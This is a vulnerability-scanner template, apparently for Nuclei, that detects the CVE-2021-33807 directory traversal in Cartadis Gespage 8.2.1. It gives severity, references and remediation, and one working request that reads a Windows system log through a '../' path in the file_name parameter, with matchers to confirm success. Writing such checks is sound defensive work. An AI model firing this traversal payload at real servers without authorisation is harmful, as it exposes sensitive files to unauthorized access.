id: CVE-2021-33807 info: name: Cartadis Gespage 8.2.1 - Directory Traversal author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system. remediation: | Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1. reference: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 - https://www.gespage.com/cartadis-db/ - https://www.cartadis.com/gespage-website/ - https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-33807 cwe-id: CWE-22 epss-score: 0.02331 epss-percentile: 0.88562 cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gespage product: gespage tags: cve,cve2021,lfi,gespage http: - method: GET path: - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log" matchers-condition: and matchers: - type: word part: body words: - "NetpDoDomainJoin:" - type: word part: header words: - "application/octet-stream" - type: status status: - 200 # digest: 4b0a00483046022100ede2230198b65a5d4d4b7f609c420491c5c1e7f005a2a493f31c9ea8f2c5f0eb022100fb55ce6346d4585a5231aebce31de3feeb20d490458b222f520e418dfe21c65f:922c64590222798bb761d5b6d8e72950